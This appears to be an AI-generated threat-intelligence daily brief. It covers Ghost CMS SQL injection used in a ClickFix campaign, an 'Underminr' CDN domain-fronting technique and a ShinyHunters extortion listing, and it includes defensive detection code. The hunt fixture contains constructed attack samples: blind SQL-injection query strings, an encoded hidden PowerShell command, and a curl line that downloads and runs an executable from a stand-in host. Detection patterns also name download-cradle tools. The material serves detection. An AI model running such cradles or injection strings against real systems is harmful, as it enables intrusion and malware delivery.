ctipilot.ch

CTI Daily Brief — 2026-05-25

Type: daily
Date: 2026-05-25
Generator: Anthropic Claude (specific model not determined)
Classification: TLP:CLEAR
Language: English
Prompt: v2.59
Items: 4
CVEs: 5

0. TL;DR

  • Ghost CMS SQL-injection flaw CVE-2026-26980 (CVSS 9.4, unauthenticated) is being mass-exploited in a large-scale ClickFix campaign — XLab/Qianxin documented 700+ compromised self-hosted Ghost sites (including Harvard, Oxford and Auburn university portals and DuckDuckGo); attackers extract the admin API key via blind SQLi, inject JavaScript that serves visitors a fake-Cloudflare "verify you are human" lure, and drop loaders/stealers on those who paste the supplied command. Affected 3.24.0–6.19.0; fixed in 6.19.1 (BleepingComputer, 2026-05-24).
  • "Underminr" is a new domain-fronting variant that defeats DNS-layer filtering on multi-tenant CDNs — ADAMnetworks showed an attacker can present an allow-listed domain's SNI/Host while the shared CDN edge routes the request to a different tenant's (attacker) origin on the same IP, blinding DNS filtering and edge-terminated TLS inspection. No CVE (architectural); ~88M domains on shared infrastructure are potentially in scope (SecurityWeek, 2026-05-23).
  • ShinyHunters listed Charter Communications (Spectrum), claiming 42M records with a 27 May deadline — a fresh victim in the Salesforce-credential campaign tracked here via 7-Eleven (2026-05-19), and by our own tracking its first telco/ISP victim to respond publicly. Charter denies any "sensitive PI or CPNI" exfiltration, a denial calibrated to FCC categories; the 42M figure is the actor's unverified claim (CyberInsider, 2026-05-23).

3. Research & Investigative Reporting

"Underminr": a multi-tenant-CDN domain-fronting variant that blinds DNS-layer filtering

ADAMnetworks disclosed Underminr, a structural evolution of domain fronting that abuses the shared-IP, multi-tenant architecture of modern CDN edges rather than a single-CDN misconfiguration (ADAMnetworks, 2026-05-21). Classic domain fronting — overriding the HTTP Host header behind a permitted SNI — was largely closed by the major CDNs in 2021–2022 by enforcing SNI/Host consistency. Underminr instead presents the SNI and HTTP Host of a legitimate, allow-listed domain hosted on a shared edge while forcing the request to the IP of a different tenant — the attacker's origin — on the same edge, exploiting the fact that the CDN's internal tenant routing is decoupled from the network-visible Host/SNI (SecurityWeek, 2026-05-23). As SecurityWeek frames it, "the detection gap appears when DNS decisions, edge IPs, SNI, Host headers, and CDN tenant routing are not correlated." No CVE was assigned — this is an architectural property of shared-edge multi-tenancy, not a software bug. SecurityWeek reports roughly 88 million domains on shared infrastructure are potentially in scope, with US, UK and Canadian infrastructure most affected; the technique does not require compromising the legitimate domain, only co-tenancy on the same edge IP range.

Why it matters to us: this maps to ATT&CK T1090.004 (Proxy: Domain Fronting) and is squarely a C2 / exfiltration-evasion concern for the many CH/EU public-sector networks whose egress control leans on DNS-layer filtering (DNS RPZ, recursive-resolver allow-lists) or that treat a CDN's published IP range as a proxy for the actual destination — both of which Underminr defeats, because the FQDN legitimately resolves to the shared edge IP and edge-terminated TLS inspection never sees the origin-routing decision. Defenders should stop treating DNS/domain allow-listing as a sufficient egress control on its own; correlate SNI, Host, the resolved edge IP and (where available) CDN tenant identity per flow, and prefer per-flow identity verification (ZTNA) over perimeter-DNS-filter trust. Specific vulnerable CDN providers are not named in the public reporting.
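
The correlation the paragraph above asks for, as an added example that is not code from ADAMnetworks, SecurityWeek or any CDN. It assumes an egress gateway that can join, per flow, the DNS answer it served the client, the destination IP, the TLS SNI, the HTTP Host (from edge-terminated inspection or the CDN customer's own edge logs) and, where the CDN exports one, the tenant that served the request. The CIDR, the names and the `tenant` field are constructed stand-ins; the three verdict functions show what a DNS-only filter, a CDN-range trust and a correlated check each decide for the same flows.

```python
"""Per-flow correlation for the Underminr detection gap described above.

Added example; not code from ADAMnetworks, SecurityWeek or any CDN. It assumes an
egress gateway that can join, per flow, the DNS answer it served the client, the
destination IP, the TLS SNI, the HTTP Host (from edge-terminated inspection or the
CDN customer's own edge logs) and, where the CDN exports one, the tenant that
served the request. The CIDR, names and the `tenant` field are constructed stand-ins.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Allow-list as a DNS-layer filter holds it, extended with the tenant that
# legitimately serves each name (assumed to come from the CDN customer's logs).
ALLOWLIST = {"portal.example.gov": "tenant-gov-portal"}

# Published shared-edge range of the (unnamed) CDN; constructed for the example.
SHARED_EDGE = ipaddress.ip_network("203.0.113.0/24")


@dataclass
class Flow:
    qname: str             # name the client asked the resolver for
    dns_answer: str        # edge IP the resolver returned for it
    dst_ip: str            # edge IP the client actually connected to
    sni: str               # TLS ClientHello server_name
    host: str              # HTTP Host header
    tenant: Optional[str]  # CDN tenant that served the request, if exported


def dns_filter_verdict(flow: Flow) -> bool:
    """A DNS-layer filter (RPZ, resolver allow-list) decides on the name alone."""
    return flow.qname in ALLOWLIST


def cdn_range_verdict(flow: Flow) -> bool:
    """Trusting the CDN's published range admits any edge IP inside it."""
    return ipaddress.ip_address(flow.dst_ip) in SHARED_EDGE


def correlated_verdict(flow: Flow) -> str:
    """Correlate DNS answer, destination IP, SNI, Host and tenant for one flow.

    'unverified' means name, IP, SNI and Host all agree but no tenant identity is
    available, so the origin-routing decision cannot be checked; local policy
    decides whether that fails open or closed.
    """
    if flow.qname not in ALLOWLIST:
        return "block"                    # not allow-listed at all
    if flow.sni != flow.qname or flow.host != flow.qname:
        return "block"                    # classic fronting: SNI/Host disagree with the name
    if flow.dst_ip != flow.dns_answer:
        return "block"                    # went to an edge IP the resolver never handed out
    if not cdn_range_verdict(flow):
        return "block"                    # resolved off the expected edge range
    if flow.tenant is None:
        return "unverified"
    if flow.tenant != ALLOWLIST[flow.qname]:
        return "block"                    # same edge IP, routed to another tenant
    return "allow"


# Constructed flows: one legitimate, two shaped like the technique.
FLOWS = {
    "legit": Flow("portal.example.gov", "203.0.113.10", "203.0.113.10",
                  "portal.example.gov", "portal.example.gov", "tenant-gov-portal"),
    # Allow-listed SNI/Host, but the client connected to a different IP in the range.
    "other_edge_ip": Flow("portal.example.gov", "203.0.113.10", "203.0.113.77",
                          "portal.example.gov", "portal.example.gov", "tenant-attacker"),
    # Same edge IP the resolver returned; only the tenant identity exposes the pivot.
    "same_edge_ip": Flow("portal.example.gov", "203.0.113.10", "203.0.113.10",
                         "portal.example.gov", "portal.example.gov", "tenant-attacker"),
}


def compare(flows=FLOWS):
    """{name: (dns_only, cdn_range, correlated)} so the gap is visible side by side."""
    return {n: (dns_filter_verdict(f), cdn_range_verdict(f), correlated_verdict(f))
            for n, f in flows.items()}


if __name__ == "__main__":
    for name, (dns_only, cdn_range, corr) in compare().items():
        print(f"{name:14s} dns-only={dns_only} cdn-range={cdn_range} correlated={corr}")
```

Both Underminr-shaped flows pass the DNS-only and CDN-range checks and are blocked only by the correlated check, and the second one is caught solely by the tenant comparison, which is the field most gateways do not have. In production, compare `dst_ip` against the full answer set the resolver served that client within the record's TTL rather than a single address, or round-robin answers will false-positive.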

4. Updates to Prior Coverage

UPDATE: ShinyHunters lists Charter Communications (Spectrum) — telco victim in the Salesforce-credential campaign

UPDATE (Salesforce-credential extortion campaign, originally covered 2026-05-19 via the 7-Eleven breach): ShinyHunters listed Charter Communications — operating consumer services under the Spectrum brand — on its leak site around 22–23 May, claiming over 42 million PII records and setting a 27 May negotiation deadline before threatened release (CyberInsider, 2026-05-23). The 42M figure is the actor's own unverified leak-site claim. Charter issued a narrowly worded statement confirming it is "following security protocols" and "alerting appropriate authorities" while explicitly denying that "sensitive personal information (PI) or customer proprietary network information (CPNI)" was exfiltrated — language calibrated to FCC-protected categories. The exclusion of non-CPNI PII (billing name, address, email) from that denial is conspicuous and leaves room for lower-sensitivity data exposure even if the denial holds.

By our own campaign tracking Charter is the first telco/ISP victim of this wave to respond publicly — an inference from the prior named victims (Instructure, Vimeo, Wynn, Vercel, Medtronic, 7-Eleven), none of them telcos, rather than a claim made by the cited sources. The pattern is consistent with the broader ShinyHunters wave against enterprise Salesforce tenants — abuse of exposed OAuth tokens and misconfigured connected-app / Experience Cloud integrations, not a vulnerability in Salesforce itself — the same vector behind the confirmed 7-Eleven breach (600k records, covered 2026-05-19). The fresh Charter listing is independently corroborated by Troy Hunt's Weekly Update 505, 2026-05-24, which records ShinyHunters' new claimed victims. For CH/EU public bodies running Salesforce: audit connected-app OAuth scopes, rotate long-lived connected-app credentials, restrict Experience/Community Cloud guest-user access, and baseline bulk-object query volumes via Shield Event Monitoring — an anomalous large SELECT against Account/Contact objects is the data-exfiltration signature to alert on.
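
The bulk-query baseline recommended above, as an added example that is not Salesforce's or any vendor's code. The rows are constructed, and the column names (TIMESTAMP, USER_ID, ENTITY_NAME, ROWS_PROCESSED) are assumptions standing in for whatever fields your Event Monitoring export actually carries. It baselines each (user, object) pair with a median/MAD statistic so that one large pull does not inflate its own baseline the way a mean/standard deviation would, and it alerts separately on pairs with no history at all, which is where a freshly minted connected app or guest user shows up.

```python
"""Baseline-and-alert on bulk object reads, as recommended above for Salesforce
tenants. Added example; not Salesforce's or any vendor's code. Rows are
constructed, and the column names (TIMESTAMP, USER_ID, ENTITY_NAME,
ROWS_PROCESSED) are assumptions standing in for whatever your Event Monitoring
export carries.
"""
from collections import defaultdict
from statistics import median

SENSITIVE = {"Account", "Contact"}   # objects the text names as the exfil signature


def baseline(rows):
    """{(user, object): (median, MAD)} of ROWS_PROCESSED over the training rows."""
    per_key = defaultdict(list)
    for r in rows:
        per_key[(r["USER_ID"], r["ENTITY_NAME"])].append(r["ROWS_PROCESSED"])
    out = {}
    for key, xs in per_key.items():
        m = median(xs)
        mad = median(abs(x - m) for x in xs) or 1.0   # floor: constant history must still alert on a spike
        out[key] = (m, mad)
    return out


def alerts(rows, base, k=6.0, min_rows=1_000):
    """Rows on a sensitive object whose count exceeds median + k*1.4826*MAD (a robust
    z-score; 1.4826 scales MAD to a standard-deviation equivalent) and an absolute
    floor. (user, object) pairs with no history alert on the floor alone."""
    hits = []
    for r in rows:
        if r["ENTITY_NAME"] not in SENSITIVE:
            continue
        key, n = (r["USER_ID"], r["ENTITY_NAME"]), r["ROWS_PROCESSED"]
        if key in base:
            m, mad = base[key]
            if n >= max(min_rows, m + k * 1.4826 * mad):
                hits.append((r["TIMESTAMP"], key, n, "above_baseline"))
        elif n >= min_rows:
            hits.append((r["TIMESTAMP"], key, n, "no_baseline"))
    return hits


def _rows(user, obj, counts, start_day=11):
    """Helper to build constructed rows, one per day starting at start_day."""
    return [{"TIMESTAMP": f"2026-05-{start_day + i:02d}", "USER_ID": user,
             "ENTITY_NAME": obj, "ROWS_PROCESSED": n} for i, n in enumerate(counts)]


# Constructed history: a nightly integration user and a sales rep, seven days each.
TRAINING = (_rows("005INTEGRATION", "Contact", [2100, 2250, 2200, 2300, 2150, 2250, 2200])
            + _rows("005SALESREP", "Contact", [40, 55, 60, 45, 50, 48, 52]))

# Constructed day under review.
TODAY = (_rows("005INTEGRATION", "Contact", [480_000], 23)
         + _rows("005SALESREP", "Contact", [61], 23)
         + _rows("005GUESTSITE", "Account", [15_000], 23)          # no history at all
         + _rows("005INTEGRATION", "Opportunity", [900_000], 23))  # outside this rule's scope

if __name__ == "__main__":
    for ts, key, n, why in alerts(TODAY, baseline(TRAINING)):
        print(ts, key, n, why)
```

With the constructed history the integration user's threshold lands at roughly 2,645 rows, so its 480,000-row Contact pull alerts while the sales rep's 61 rows does not; tune `k` and `min_rows` against a few weeks of your own export before alerting on it.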

5. Deep Dive — Ghost CMS CVE-2026-26980 → ClickFix: the CMS-compromise-to-endpoint kill chain

Background. CVE-2026-26980 was disclosed and patched in Ghost 6.19.1 on 19 February 2026, and SentinelOne reported in-the-wild exploitation and published detection guidance by 27 February (BleepingComputer, 2026-05-24). The May activity XLab documented is not a new bug but a large-scale weaponisation of the unpatched long tail of self-hosted instances, repurposing compromised editorial sites as a high-traffic, low-attributable delivery surface for ClickFix social engineering (XLab Qianxin, 2026-05-21). ClickFix / FakeCaptcha — tricking a user into pasting an attacker-supplied command into the Run dialog or a terminal — has been a tracked initial-access technique since 2024; what is notable here is the combination of a CVSS-9.4 pre-auth CMS flaw as the distribution mechanism with a fingerprinting/cloaking stage that keeps the lure invisible to non-targets and to casual review.

Kill chain → MITRE ATT&CK.

  • Initial access — T1190 Exploit Public-Facing Application. Unauthenticated boolean-based blind SQL injection through the Content API's slug filter parameter. No credentials, no user interaction — the request pattern the vendor mitigation keys on is a query string containing slug:[ (slug%3A%5B).
  • Credential access — T1552 Unsecured Credentials. The injection is used to read the admin API key out of Ghost's database. This key is a bearer token with full content-management scope, so its theft is the privilege pivot — there is no separate authentication step after extraction.
  • Content injection / defacement — T1659 Content Injection. With the admin key the attacker injects a lightweight JavaScript loader into published articles and/or theme templates, so the malicious code is served to every visitor from the site's own trusted origin.
  • Execution-guardrails cloaking — T1480 Execution Guardrails. The loader fetches a second-stage cloaking script that fingerprints each visitor and only proceeds for those matching the target profile (e.g. Windows desktop), so most visitors and most analysts never see the lure.
  • User execution — T1204.002 User Execution: Malicious File, chained to T1059.001 PowerShell / T1059.003 Windows Command Shell. Qualifying visitors are shown a fake Cloudflare "verify you are human" prompt in an overlay iframe instructing them to paste a supplied command into the Windows Run dialog (Win+R) or a terminal.
  • Payload delivery — T1105 Ingress Tool Transfer. The pasted command pulls follow-on payloads; XLab observed DLL loaders, JavaScript droppers, and an Electron-based sample named UtilifySetup.exe, leading to info-stealer / RAT capability.

Detection concepts (no IOCs). Two distinct hunt surfaces:

  • Server-side, for Ghost operators. Review web-server / reverse-proxy access logs for Content API requests to /ghost/api/content/ whose filter/slug parameter contains slug:[ (slug%3A%5B) or boolean-blind SQL artefacts (AND, CASE, time-delay primitives) — the vendor mitigation pattern is the highest-fidelity signal. In the Ghost admin audit trail, alert on unexpected article or theme modifications, and on any <script> element appearing in post content or theme files that has no editorial counterpart.
  • Client-side, for everyone (the product-agnostic, higher-value hunt). The ClickFix execution chain is independent of Ghost and is the artefact most defenders can actually catch: Sysmon Event ID 1 / Windows 4688 for cmd.exe or powershell.exe (especially with -EncodedCommand, clipboard-paste context, mshta, curl/certutil download cradles) whose parent process is a browser (chrome.exe, msedge.exe, firefox.exe, brave.exe) or explorer.exe immediately following a Win+R Run-dialog launch. Note that 4688 only carries the command line if the "Include command line in process creation events" audit policy is enabled; without it the cradle is invisible. Flag execution of unsigned Electron applications from user-writable paths. Enable PowerShell Script Block Logging (Event ID 4104) to capture the pasted stager body.
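
Both hunt surfaces above as runnable logic, an added example that is not SentinelOne's, XLab's or Ghost's code. The access-log lines and the process-creation events are constructed, the regexes encode only the patterns the bullets name (slug:[ / slug%3A%5B, boolean and time-based SQLi artefacts, browser-parented shells, download cradles after a Run-dialog launch, unsigned binaries in user-writable paths) and are starting points rather than a validated signature set, and the `Signed` field is not part of Sysmon Event ID 1: it is assumed to be enriched by the EDR.

```python
"""Hunt logic for the two surfaces above: Ghost Content API access logs and Windows
process-creation events. Added example; not SentinelOne's, XLab's or Ghost's code.
Log lines and events are constructed; the regexes are starting points, not a
validated signature set. `Signed` is not a Sysmon EID 1 field: assumed EDR enrichment.
"""
import re
from urllib.parse import unquote

# --- Server side: Ghost Content API requests -----------------------------------
CONTENT_API = "/ghost/api/content/"
SLUG_FILTER = re.compile(r"slug:\[", re.I)        # vendor mitigation pattern, decoded form
SQLI_ARTEFACTS = re.compile(
    r"\b(AND|OR)\b\s*[\w'\"()]+\s*=|\bCASE\b\s+WHEN|\bSLEEP\s*\(|\bpg_sleep\s*\(|\bBENCHMARK\s*\(",
    re.I)
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify_access_line(line):
    """(reason, decoded_path) for a suspicious Content API request, else None."""
    m = ACCESS_LINE.match(line)
    if not m or not m.group("path").startswith(CONTENT_API):
        return None
    path = unquote(m.group("path"))   # one decode: %3A%5B -> :[ (double-encoding evasion is a known gap)
    if SLUG_FILTER.search(path):
        return ("slug_filter_pattern", path)
    if SQLI_ARTEFACTS.search(path):
        return ("sqli_artefact", path)
    return None


def hunt_access_log(text):
    return [hit for hit in map(classify_access_line, text.splitlines()) if hit]


# --- Client side: process creation (Sysmon EID 1 / Windows 4688 field names) ----
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
CRADLE = re.compile(
    r"-enc\w*|-ec\b|\bmshta\b|\bcurl\b|\bcertutil\b|\biwr\b|Invoke-WebRequest|DownloadString", re.I)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\", re.I)


def classify_process_event(ev):
    """Reasons an event is interesting (empty list = not)."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    reasons = []
    if image in SHELLS and parent in BROWSERS:
        reasons.append("shell_spawned_by_browser")
    if image in SHELLS and parent == "explorer.exe" and CRADLE.search(cmd):
        reasons.append("explorer_shell_with_download_cradle")   # Win+R Run-dialog shape
    if ev.get("Signed", "true").lower() == "false" and USER_WRITABLE.search(ev["Image"]):
        reasons.append("unsigned_from_user_writable_path")      # refine on Electron markers if the EDR tags them
    return reasons


def hunt_process_events(events):
    return {i: r for i, ev in enumerate(events) if (r := classify_process_event(ev))}


# Constructed access-log lines (combined log format) and EID 1-shaped events.
ACCESS_LOG = """\
198.51.100.7 - - [21/May/2026:10:02:11 +0000] "GET /ghost/api/content/posts/?key=k&filter=slug%3A%5Bx%5D%20AND%201%3D1 HTTP/1.1" 200 512
198.51.100.7 - - [21/May/2026:10:02:12 +0000] "GET /ghost/api/content/posts/?key=k&filter=tag%3Anews%20AND%20(CASE%20WHEN%20(1%3D1)%20THEN%201%20END) HTTP/1.1" 200 88
203.0.113.5 - - [21/May/2026:10:03:00 +0000] "GET /ghost/api/content/posts/?key=k&limit=5 HTTP/1.1" 200 4096
203.0.113.5 - - [21/May/2026:10:03:01 +0000] "GET /assets/css/main.css HTTP/1.1" 200 1200
"""

EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "powershell.exe -w hidden -EncodedCommand SQBFAFgAKABpAHcAcgAgAGgAdAB0AHAA", "Signed": "true"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c curl -o %TEMP%\u.exe http://example.invalid/u && %TEMP%\u.exe", "Signed": "true"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\UtilifySetup.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "UtilifySetup.exe", "Signed": "false"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir", "Signed": "true"},
]

if __name__ == "__main__":
    for reason, path in hunt_access_log(ACCESS_LOG):
        print("ghost   ", reason, path)
    for i, reasons in hunt_process_events(EVENTS).items():
        print("endpoint", i, reasons)
```

One caveat before turning the server-side pattern into a blocking WAF rule: Ghost's own filter syntax allows list values in square brackets, so check whether your theme's Content API calls ever emit `slug:[...]` legitimately; the interim vendor mitigation accepts that trade-off, and the SQLi-artefact branch is the lower-noise signal on a site that does.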

Hardening / mitigation.

  • Ghost: upgrade to 6.19.1 or later; until then block slug:[ / slug%3A%5B at the WAF and restrict the public Content API to trusted origins. Assume the admin API key was stolen on any internet-exposed instance — rotate it after patching and audit all posts and theme files for injected scripts.
  • Endpoint (the ClickFix surface, applies broadly): where operationally feasible, disable the Win+R Run dialog for standard users via the NoRun policy (GPO), deploy detection for clipboard-to-shell execution, and run user-awareness that any web page asking you to "paste this command to prove you are human" is an attack. Constrained Language Mode plus full PowerShell logging reduces the blast radius of a successful paste.

6. Action Items

  • Patch self-hosted Ghost CMS to 6.19.1+ now if internet-exposed — interim, block Content API requests containing slug:[ (slug%3A%5B) at the WAF and restrict the public Content API to trusted origins. Then rotate the Ghost admin API key (assume theft on any exposed instance) and audit posts/themes for injected <script> (§ 2, § 5) (GHSA-w52v-v783-gw97).
  • Hunt the ClickFix execution chain regardless of whether you run Ghost: cmd.exe/powershell.exe spawned from browser process trees or from explorer.exe after a Win+R launch (Sysmon EID 1 / Windows 4688, with command-line auditing enabled), unsigned Electron apps from user-writable paths; enable PowerShell Script Block Logging (4104); brief users that "paste this to verify you are human" is an attack (§ 5) (XLab Qianxin, 2026-05-21).
  • Stop treating DNS / domain allow-listing as a sufficient egress control — Underminr defeats DNS-layer filtering and CDN-IP-range trust on multi-tenant edges; correlate SNI, Host, resolved edge IP and CDN tenant per flow, and move toward per-flow identity (ZTNA) for high-value egress paths (§ 3) (SecurityWeek, 2026-05-23).
  • If you run Salesforce, harden connected apps — audit OAuth app scopes, rotate long-lived connected-app credentials, restrict Experience/Community Cloud guest access, and baseline bulk-object query volumes via Shield Event Monitoring; an anomalous large SELECT on Account/Contact is the exfiltration signature (§ 4) (CyberInsider, 2026-05-23).

7. Verification Notes

  • Items dropped (with reason):
    • Laravel-Lang / Packagist supply-chain attack (surfaced by S1, S2 and S3) — already the deep dive in the 2026-05-24 brief (both the autoloader-backdoor strand and the eight-package postinstall strand); no material in-window delta. PD-8 duplicate. Note: S2's findings additionally carried the attacker C2 domain and VirusTotal payload hashes — excluded per the no-IOC policy regardless of the dedup.
    • Exim "Dead.Letter" CVE-2026-45185 (S2) — unauthenticated BDAT use-after-free in Exim 4.97–4.99.2 GnuTLS builds (the default MTA on Debian/Ubuntu) with possible RCE, fixed in 4.99.3. Operationally significant for EU public-sector self-hosted mail, but the freshest source is XBOW/THN/NCSC-NL dated 2026-05-12 to 2026-05-15 — roughly 10 days outside the 36h window with no fresh in-window development. Held as out-of-window; flagged for catch-up if confirmed ITW exploitation or a mass-scanning report lands in window.
    • Stormshield SNS DoS CVE-2025-9086 / CERTFR-2026-AVI-0631 (S2) — remote denial-of-service only, no code-execution path, no exploitation; already assessed and dropped in the 2026-05-24 § 7, and out-of-window (2026-05-21/22). Below the § 2 inclusion gate.
    • GLPI CVE-2026-32312 / CVE-2026-42320 / CERTFR-2026-AVI-0609 (S2) — moderate severity (CVSS 5.1 / 5.9), both post-authentication, no exploitation; out-of-window (2026-05-18/19). Strong CH/EU public-sector ITSM footprint noted, but below the § 2 inclusion gate.
    • Cloud Atlas PowerCloud / VBCloud (S3) — Kaspersky Securelist, 2026-05-22; targeting is Russian/Belarusian government, CH/EU nexus is speculative, and the source is out-of-window. Dropped on nexus + recency.
    • The Oncology Institute SEC Item 1.05 8-K (S4) — US/indirect nexus, [SINGLE-SOURCE] (SEC filing plus aggregator), out-of-window (2026-05-22); already assessed and dropped in the 2026-05-24 § 7.
  • Contradiction resolved (Ghost CMS versions/component): S1 and S3 both surfaced CVE-2026-26980 but disagreed — S1 reported affected 3.24.0–6.19.0 / fixed 6.19.1 / Content API slug filter; S3 reported affected < 5.84.0 / fixed 5.84.0 / ORDER BY clause. The authoritative TryGhost advisory GHSA-w52v-v783-gw97 confirms S1 (affected 3.24.0–6.19.0, fixed 6.19.1, unauthenticated SQLi in the Content API slug filter, CVSS 9.4). S3's version and component details were incorrect and were not used.
  • URL corrections: both sub-agents' BleepingComputer URLs for the Ghost story 404'd on direct fetch (/ghost-cms-vulnerability-exploited-to-hack-sites-spread-malware/ and /ghost-blogging-platform-hacked-to-push-clickfix-via-sql-injection/); replaced with the verified in-window article /ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/ (2026-05-24). S3's XLab URL was the correct one and is used as a primary.
  • Reduced confidence / window edge: Underminr (§ 3) — the freshest source (SecurityWeek, 2026-05-23 ~11:00 UTC) sits ~5 h outside the strict 36 h window but inside the 72 h developing window; included as substantive novel network-evasion research directly relevant to CH/EU DNS-filtering egress architectures. The ADAMnetworks primary is 2026-05-21. Specific vulnerable CDN providers are not named in the public reporting and are not asserted here.
  • Leak-site claim (Charter, § 4): ShinyHunters' 42M-record figure is the actor's unverified leak-site assertion, presented as such; corroborated by Charter's own public statement (a partial denial confirming an incident) and Troy Hunt Weekly 505 (2026-05-24, which corroborates the fresh victim listing, not the Salesforce vector). The campaign-continuity link to 7-Eleven, and the "first telco/ISP victim to respond publicly" characterisation, are our own campaign-tracking assessments (inferred from the prior named victims, none of them telcos), not attributions or claims made by the cited sources.
  • Single-source items in §§ 1–5: none — all included items carry ≥2 independent sources (Ghost: vendor advisory + research lab + news; Underminr: vendor primary + journalism; Charter: victim statement + journalism).
  • Main-agent model self-identification: the runtime self-identification env vars (CLAUDE_FRIENDLY_NAME / CLAUDE_MODEL_ID) were unset and the routine configuration withheld the main-agent model identifier from committed artefacts this run; recorded as "specific model not determined" in the AI-content notice and unknown in state/run_log.json per the prompt's fallback. Sub-agent models (Claude Sonnet 4.6) and the verifier model are recorded verbatim as self-reported.
  • Candidate sources: surfaced this run — xbow-security (S2), xlab-qianxin (S3), aikido-security (S1/S3), adamnetworks (S3). Added one per the one-per-run cap: xlab-qianxin (Qianxin X-Lab — primary discoverer of the in-window Ghost CMS exploitation wave; contributed two cited items today). The others are held as overflow for a future run.
  • Stalled sub-agents: none — S1–S4 all returned within the 30-minute budget.
  • Coverage gaps: sophos-xops (HTTP 503, 5th consecutive run); trendmicro-research (no in-window publications); inside-it-ch (Cloudflare challenge on bridge + no usable Wayback snapshot, 4th consecutive run); databreaches-net (HTTP 403, no targeted article URLs); cisco-psirt (PSIRT RSS 404, no in-window advisories via search); cisa-kev (latest update 2026-05-22, outside window); cert-eu (no advisory in window, latest 2026-006); cert-fr-actu (feed stalled since 2025); mandiant-gtig, dfirreport (no in-window items); ico-uk, cnil-fr, edpb (no in-window enforcement actions); sec-disclosures-edgar (filing index pages 403, content via search/aggregators).